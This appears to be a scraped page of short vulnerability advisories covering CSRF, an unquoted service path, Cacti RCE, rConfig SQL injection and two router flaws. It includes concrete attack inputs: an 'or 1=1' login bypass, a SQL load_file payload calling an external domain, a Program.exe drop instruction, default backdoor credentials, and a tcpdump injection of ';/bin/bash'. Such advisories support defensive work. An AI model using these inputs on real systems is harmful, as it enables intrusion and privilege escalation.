The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.
The application suffers from an unquoted search path issue impacting the service 'SOUND4 Server' for Windows. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
Cacti is vulnerable to Remote Command Execution (RCE) due to improper input validation. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary commands on the server.
An attacker can bypass the login page and access the dashboard page by using a payload of 'or 1=1-- - for the username and random words for the password.
Judging Management System v1.0 is vulnerable to Remote Code Execution (RCE) due to an authentication bypass vulnerability and unrestricted file upload vulnerability. An attacker can exploit this vulnerability to gain access to the application and execute arbitrary code on the server.
rConfig is a web-based network device configuration management application. A SQL injection vulnerability exists in rConfig 3.9.7 and prior versions. An authenticated attacker can exploit this vulnerability to execute arbitrary SQL commands on the underlying database. This can be exploited to gain access to sensitive information such as usernames and passwords.
The manual insertion `point 3` with `class` parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\0absu0byc9uwy8ivftx7f6auul0fo5cwfk6at2hr.again.comfbe'))+' was submitted in the manual insertion point 3. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.
A successful exploit of this vulnerability could allow a threat actor to execute code during startup or reboot with System privileges. Drop payload 'Program.exe' in C: and restart service or computer to trigger.
A silent privileged backdoor account discovered on the Prolink PRS1841 routers; allows attackers to gain command execution privileges to the router OS. The vulnerable account issued by the vendor was identified as "adsl" and "realtek" as the default password; attackers could use this account to access the router remotely/internally using either Telnet or FTP protocol.
ASKEY RTF3505VW-N1 devices are provided with access through ssh into a restricted default shell (credentials are on the back of the router and in some cases this routers use default credentials). The command “tcpdump” is present in the restricted shell and do not handle correctly the -z flag, so it can be used to escalate privileges through the creation of a local file in the /tmp directory of the router, and injecting packets through port 80 used for the router's Web GUI) with the string ';/bin/bash' in order to be executed by '-z sh'. By using “;/bin/bash” as injected string we can spawn a busybox/ash console.
Services By CQR